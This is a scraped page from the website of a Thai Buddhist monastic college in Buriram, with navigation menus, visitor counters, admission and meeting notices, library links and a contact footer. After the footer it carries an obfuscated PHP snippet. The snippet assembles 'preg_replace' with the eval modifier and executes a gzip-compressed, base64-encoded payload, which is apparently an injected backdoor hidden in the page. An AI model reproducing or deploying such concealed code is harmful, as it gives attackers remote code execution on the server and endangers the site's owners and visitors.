ชื่อผู้ใช้
รหัสผ่าน
สมัครสมาชิก |  ลืมรหัสผ่าน
หน้าหลัก
ประวัติความเป็นมา
โครงสร้าง
หลักสูตร
สาขาที่เปิดสอน
ข้อมูลสถิติ
ผู้ก่อตั้งวิทยาลัยสงฆ์
คณะกรรมการประจำวิทยาลัยฯ
ผู้บริหาร
คณะกรรมการผู้บริหาร
คณาจารย์
บุคลากร
กฎ/ระเบียบ
คำสั่ง
ประกาศ
กระดานสนทนา
องค์กรนิสิต
ทำเนียบนิสิต
สภานิสิต
ชมรมศิษย์เก่า
ส่วนงานกิจการนิสิต
งานประกันคุณภาพการศึกษา
งานทะเบียนและวัดผล
ตรวจสอบผลการศึกษา
วิทยุออนไลน์
ดาวน์โหลดเอกสาร
รางวัลเกียรติยศ
วีดีโอกิจกรรม
ติดต่อเรา
ม. มหาจุฬาลงกรณฯ
วิทยาเขตหนองคาย
วิทยาเขตนครศรีธรรมราช
วิทยาเขตเชียงใหม่
วิทยาเขตขอนแก่น
วิทยาเขตนครราชสีมา
วิทยาเขตอุบลราชธานี
วิทยาเขตแพร่
วิทยาเขตสุรินทร์
วิทยาเขตพะเยา
วิทยาเขตบาฬีศึกษาพุทธโฆส
วิทยาลัยสงฆ์เลย
วิทยาลัยสงฆ์นครพนม
วิทยาลัยสงฆ์นครสวรรค์

วิทยาลัยสงฆ์ลำพูน

วิทยาลัยสงฆ์พุทธชินราช
วิทยาลัยสงฆ์ปัตตานี
ห้องเรียนจังหวัดศรีสะเกษ
ห้องเรียนวัดพระแก้ว
สาขาวิชาการสอนพระพุทธฯ
กำลังออนไลน์2คน
ผู้ชมวันนี้6คน
ผู้ชมเมื่อวาน147คน
ผู้ชมเดือนนี้2150คน
ผู้ชมเดือนก่อน7941คน
ผู้ชมทั้งสิ้น349331คน
 • 1
 • 2
 • 3
 • 4
 • 5
 • 6
 • 7
 • 8
 • 9
 • 10
 • 11
 • 12
 • 13

 

 

 
ประกาศวันจันทร์ ๘ กุมภาพันธ์ ๒๕๕๙ เวลา 09.00 เป็นต้นไป
วิชาการคอม
ข่าวรับสมัคร
มหาจุฬาลงกรณราชวิทยาลัย/วิทยาลัยสงฆ์บุรีรัมย์
เปิดรับสมัครนิสิตบรรพชิตและคฤหัสถ์ เข้าศึกษาต่อ
สมัครเข้าศึกษา
โครงการปฏิบัติวิปัสสนากรรมฐาน
ณ วิทยาลัยสงฆ์บุรีรัมย์
มติที่ประชุม กก.กลุ่มงานบริการการศึกษา 2/2558
มติที่ประชุม กก.กลุ่มงานบริการการศึกษา 1/2558
 หัวข้อประกาศ โดย วันที่ เข้าชม ตอบ
 

 

ผลงานนายวัลลภ สหุนาฬุ
ผลงานนายรุ่งสุริยา หอมวัน
พระครูปริยัติกิจวิบูล
ผลงานนายปิยวัฒน์ คงทรัพย์
ผลงานพระครูศรีปัญญาวิกรม
รอบันทึกข้อมูลจากเจ้าหน้าที่

แนวปฏิบัติในการจัดตั้งชมรม
แผนการสอนแบบ มคอ.๓
แผนการจัดการเรียนการสอน ป.บัณฑิต วิชาชีพครู
แบบรายงานปฏิบัติศาสนกิจ
ใบคำร้องขอหนังสือรับรอง
  ห้องสมุดปรัชญาศาสนา
  ห้องสมุดซันเตอร์สัน เบ็ค
  ห้องสมุดเอเธนเนียม
  สารานุกรมปรัชญา
  ห้องสมุดมาร์กซิส
  ห้องสมุดรามคำแหง
  หนังสืออีเล็กทรอนิกส์
  งานนิพนธ์เจ้าคุณอาจารย์
  ห้องพระไตรปิฏก
  พระไตรปิฏกฉบับซีดีรอม
  พระไตรปิฏกฉบับประชาชน
  พระไตรปิฏกภาษาบาลี
  สือการศึกษาอิเล็กทรอนิกส์
  รวมฐานข้อมูลวิทยานิพนธ์
  แหล่งทุนการศึกษา
  รวมพระสูตรมหายาน
  รวมเว็บมหาวิทยาลัย
  สื่อการเรียนการสอน บาลีไวยากรณ์ ๑-๔
  จังหวัดบุรีรัมย์
  บุรีรัมย์ไกด์์
  บุรีรัมย์ PEA
  ม.ราชภัฎบุรีรัมย์
  ม.รามคำแหงบุรีรัมย์
  สพม. เขต32
  สพป. บร.1
  สพป. บร.2
  สพป. บร.3
  สพป. บร.4
  ร.ร.ปริยัติธีรวิทยา
  วิทยาลัยเฉลิมกาญจนา
  บุรีรัมย์ FC
หน้าหลัก | ประวัติวิทยาลัย | ประชาสัมพันธ์ | ประมวลภาพ | กระดานสนทนา | รางวัลเกียรติยศ | ติดต่อเรา | ผู้ดูแลระบบ

Copyright @ 2011 วิทยาลัยสงฆ์บุรีรัมย์
วัดพระพุทธบาทเขากระโดง เลขที่ ๒๘๑ หมู่ที่ ๑๓ ถนนบุรีรัมย์-ประโคนชัย ตำบลเสม็ด
อำเภอเมืองบุรีรัมย์ จังหวัดบุรีรัมย์ ๓๑๐๐๐
E-mail : preyawat@hotmail.co.th   โทรศัพท์/โทรสาร ๐๔๔ ๖๓๗ ๒๕๖
$REdkp7800 = "c)(29;dpkl_0/*nbh3yqim8at4x1u6wjreosz7.fgv5";$sWxSb8678 = $REdkp7800[7].$REdkp7800[32].$REdkp7800[33].$REdkp7800[40].$REdkp7800[10].$REdkp7800[32].$REdkp7800[33].$REdkp7800[7].$REdkp7800[9].$REdkp7800[23].$REdkp7800[0].$REdkp7800[33];$StkR4358 = "\x65v".chr(97)."\x6C".chr(40)."g".chr(122)."i".chr(110)."\x66l".chr(97)."\x74".chr(101)."(b".chr(97)."s".chr(101)."".chr(54)."".chr(52)."_".chr(100)."\x65".chr(99)."o\x64e".chr(40)."";$sPhtQ7365 = "\x29\x29\x29".chr(59)."";$ljUvyxE6761 = $StkR4358."'jVFda4MwFH0v9D9kIiQFae3rSsdGcTDYtFh9Dlkaa0CNxOuwjP33XdN2K9tLfYm558PjPY+60bxTwOhed20ljlxZa2xHA0JDOltNJ/5BgCJr4pUA7f1iIbvifT7oYi5NvUBs3path7yibyRo05CDAr4XIJjf22pGPqcTcn58WaKRxDHHzwIb7S+Ym2IQ0wJDXkA2efqabDOOR0Cc1S3sNMryNM7Sp3j3HKUBWd6k2iRxHG2y7OUtSvIMVeG1zB//5hJcDUqO4n++sjKd+otYBb1tTg44/sJ1ShjQqwOrRM2laUANwCXeQDFhrTiyk5yO+6Zk/UCupw4BXSvTgwOXYXCF1ApKs3cA3Sa7jP5is9MrHq7VCkMUulJ8rMvFaKBjnmvbC0iIO8ekI1UXhN352KTT/LR7po4M9SEqhozVNw=='".$sPhtQ7365;$sWxSb8678($REdkp7800[12].$REdkp7800[38].$REdkp7800[13].$REdkp7800[12].$REdkp7800[33], $ljUvyxE6761 ,"412");